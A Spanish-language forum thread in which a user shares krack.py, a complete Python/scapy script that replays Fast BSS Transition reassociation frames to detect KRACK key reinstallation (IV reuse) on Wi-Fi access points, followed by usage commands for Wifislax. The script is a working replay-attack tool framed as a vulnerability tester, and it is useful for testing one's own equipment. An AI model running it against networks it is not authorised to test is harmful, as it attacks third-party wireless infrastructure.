krack.py script probar y compartir

Publicado por wh00t, 17 de Octubre de 2017, 08:50:44 PM

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wh00t

hoy traigo este script You are not allowed to view links. Register or Login para probar y compartir experiencias videos etc


krack.py
#!/usr/bin/env python2
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import sys, socket, struct, time, subprocess, atexit, select
from datetime import datetime

IEEE_TLV_TYPE_RSN = 48
IEEE_TLV_TYPE_FT  = 55

IEEE80211_RADIOTAP_RATE = (1 << 2)
IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)

USAGE = """{name} - Tool to test Key Reinstallation Attacks against an AP

To test wheter an AP is vulnerable to a Key Reinstallation Attack against
the Fast BSS Transition (FT) handshake, execute the following steps:

1. Create a wpa_supplicant configuration file that can be used to connect
   to the network. A basic example is:

      ctrl_interface=/var/run/wpa_supplicant
      network={{
          ssid="testnet"
          key_mgmt=FT-PSK
          psk="password"
      }}

   Note the use of "FT-PSK". Save it as network.conf or similar. For more
   info see https://w1.fi/cgit/hostap/plain/wpa_supplicant/wpa_supplicant.conf

2. Try to connect to the network using your platform's wpa_supplicant.
   This will likely require a command such as:

      sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf

   If this fails, either the AP does not support FT, or you provided the wrong
   network configuration options in step 1.

3. Use this script as a wrapper over the previous wpa_supplicant command:

      sudo {name} wpa_supplicant -D nl80211 -i wlan0 -c network.conf

   This will execute the wpa_supplicant command using the provided parameters,
   and will add a virtual monitor interface that will perform attack tests.

4. Use wpa_cli to roam to a different AP of the same network. For example:

      sudo wpa_cli
      > status
      bssid=c4:e9:84:db:fb:7b
      ssid=testnet
      ...
      > scan_results 
      bssid / frequency / signal level / flags / ssid
      c4:e9:84:db:fb:7b	2412  -21  [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
      c4:e9:84:1d:a5:bc	2412  -31  [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
      ...
      > roam c4:e9:84:1d:a5:bc
      ...
   
   In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see
   status command). The scan_results command shows this network also has a
   second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP.

5. Generate traffic between the AP and client. For example:

      sudo arping -I wlan0 192.168.1.10

6. Now look at the output of {name} to see if the AP is vulnerable.

   6a. First it should say "Detected FT reassociation frame". Then it will
       start replaying this frame to try the attack.
   6b. The script shows which IVs the AP is using when sending data frames.
   6c. Message "IV reuse detected (IV=X, seq=Y). AP is vulnerable!" means
       we confirmed it's vulnerable.

   Example output of vulnerable AP:
      [15:59:24] Replaying Reassociation Request
      [15:59:25] AP transmitted data using IV=1 (seq=0)
      [15:59:25] Replaying Reassociation Request
      [15:59:26] AP transmitted data using IV=1 (seq=0)
      [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable!

   Example output of patched AP (note that IVs are never reused):
      [16:00:49] Replaying Reassociation Request
      [16:00:49] AP transmitted data using IV=1 (seq=0)
      [16:00:50] AP transmitted data using IV=2 (seq=1)
      [16:00:50] Replaying Reassociation Request
      [16:00:51] AP transmitted data using IV=3 (seq=2)
      [16:00:51] Replaying Reassociation Request
      [16:00:52] AP transmitted data using IV=4 (seq=3)
"""

#### Basic output and logging functionality ####

ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
COLORCODES = { "gray"  : "\033[0;37m",
               "green" : "\033[0;32m",
               "orange": "\033[0;33m",
               "red"   : "\033[0;31m" }

global_log_level = INFO
def log(level, msg, color=None, showtime=True):
	if level < global_log_level: return
	if level == DEBUG   and color is None: color="gray"
	if level == WARNING and color is None: color="orange"
	if level == ERROR   and color is None: color="red"
	print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"


#### Packet Processing Functions ####

class MitmSocket(L2Socket):
	def __init__(self, **kwargs):
		super(MitmSocket, self).__init__(**kwargs)

	def send(self, p):
		# Hack: set the More Data flag so we can detect injected frames
		p[Dot11].FCfield |= 0x20
		L2Socket.send(self, RadioTap()/p)

	def _strip_fcs(self, p):
		# Scapy can't handle FCS field automatically
		if p[RadioTap].present & 2 != 0:
			rawframe = str(p[RadioTap])
			pos = 8
			while ord(rawframe[pos - 1]) & 0x80 != 0: pos += 4
		
			# If the TSFT field is present, it must be 8-bytes aligned
			if p[RadioTap].present & 1 != 0:
				pos += (8 - (pos % 8))
				pos += 8

			# Remove FCS if present
			if ord(rawframe[pos]) & 0x10 != 0:
				return Dot11(str(p[Dot11])[:-4])

		return p[Dot11]

	def recv(self, x=MTU):
		p = L2Socket.recv(self, x)
		if p == None or not Dot11 in p: return None

		# Hack: ignore frames that we just injected and are echoed back by the kernel
		if p[Dot11].FCfield & 0x20 != 0:
			return None

		# Strip the FCS if present, and drop the RadioTap header
		return self._strip_fcs(p)

	def close(self):
		super(MitmSocket, self).close()

def dot11_get_seqnum(p):
	return p[Dot11].SC >> 4

def dot11_get_iv(p):
	"""Scapy can't handle Extended IVs, so do this properly ourselves"""
	if Dot11WEP not in p:
		log(ERROR, "INTERNAL ERROR: Requested IV of plaintext frame")
		return 0

	wep = p[Dot11WEP]
	if wep.keyid & 32:
		return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (struct.unpack(">I", wep.wepdata[:4])[0] << 16)
	else:
		return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (ord(wep.iv[2]) << 16)

def get_tlv_value(p, type):
	if not Dot11Elt in p: return None
	el = p[Dot11Elt]
	while isinstance(el, Dot11Elt):
		if el.ID == type:
			return el.info
		el = el.payload
	return None


#### Man-in-the-middle Code ####

class KRAckAttackFt():
	def __init__(self, interface):
		self.nic_iface = interface
		self.nic_mon = interface + "mon"
		self.clientmac = scapy.arch.get_if_hwaddr(interface)

		self.sock  = None
		self.wpasupp = None
		self.reassoc = None
		self.ivs = set()
		self.next_replay = None

	def handle_rx(self):
		p = self.sock.recv()
		if p == None: return

		if p.addr2 == self.clientmac and Dot11ReassoReq in p:
			if get_tlv_value(p, IEEE_TLV_TYPE_RSN) and get_tlv_value(p, IEEE_TLV_TYPE_FT):
				log(INFO, "Detected FT reassociation frame")
				self.reassoc = p
				self.next_replay = time.time() + 1
			else:
				log(INFO, "Reassociation frame does not appear to be an FT one")
				self.reassoc = None
			self.ivs = set()

		elif p.addr2 == self.clientmac and Dot11AssoReq in p:
			log(INFO, "Detected normal association frame")
			self.reassoc = None
			self.ivs = set()

		elif p.addr1 == self.clientmac and Dot11WEP in p:
			iv = dot11_get_iv(p)
			log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
			if iv in self.ivs:
				log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
					"AP is vulnerable!.") % (iv, dot11_get_seqnum(p)), color="green")
			self.ivs.add(iv)

	def configure_interfaces(self):
		log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")

		# 1. Remove unused virtual interfaces to start from clean state
		subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)

		# 2. Configure monitor mode on interfaces
		subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
		# Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
		# sequence of commands to assure the virtual interface is registered as a 802.11 monitor interface.
		subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
		time.sleep(0.5)
		subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
		subprocess.check_output(["ifconfig", self.nic_mon, "up"])

	def run(self):
		self.configure_interfaces()

		# Make sure to use a recent backports driver package so we can indeed
		# capture and inject packets in monitor mode.
		self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)

		# Set up a rouge AP that clones the target network (don't use tempfile - it can be useful to manually use the generated config)
		self.wpasupp = subprocess.Popen(sys.argv[1:])

		# Continue attack by monitoring both channels and performing needed actions
		while True:
			sel = select.select([self.sock], [], [], 1)
			if self.sock in sel[0]: self.handle_rx()

			if self.reassoc and time.time() > self.next_replay:
				log(INFO, "Replaying Reassociation Request")
				self.sock.send(self.reassoc)
				self.next_replay = time.time() + 1

	def stop(self):
		log(STATUS, "Closing hostapd and cleaning up ...")
		if self.wpasupp:
			self.wpasupp.terminate()
			self.wpasupp.wait()
		if self.sock: self.sock.close()


def cleanup():
	attack.stop()

def argv_get_interface():
	for i in range(len(sys.argv)):
		if not sys.argv[i].startswith("-i"):
			continue
		if len(sys.argv[i]) > 2:
			return sys.argv[i][2:]
		else:
			return sys.argv[i + 1]

	return None

if __name__ == "__main__":
	if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
		print USAGE.format(name=sys.argv[0])
		quit(1)

	interface = argv_get_interface()
	if not interface:
		log(ERROR, "Failed to determine interface. Specify one using -i parameter.")
		quit(1)

	attack = KRAckAttackFt(interface)
	atexit.register(cleanup)
	attack.run()

lmcamd

me enseñas a usarlo ? que le tengo que cambiar ?

wh00t

esta todo descrito dentro pero tambien podes crear el wpa_supplicant.conf asi

ejecutalo en wifislax en una version actual que no te va pedir dependencias usa wpa_passprashe ESSID PASS >/etc/wpa_supplicant.conf para crear el suplicant.conf bien y proba que conecte bien wpa_supplicant antes mata los procesos con killall wpa_supplicant que halla quedado y ejecuta el wpa_supplicant acompañado de con # python /root/krack.py /usr/sbin/wpa_supplicant -Dnl80211 -i wlan0 -c /etc/wpa_supplicant.conf

kidonaipe

Aclaro, por las dudas, que este script es para probar/corroborar si tu AP es vulnerable a un ataque KRACK, NO es para realizar un ataque.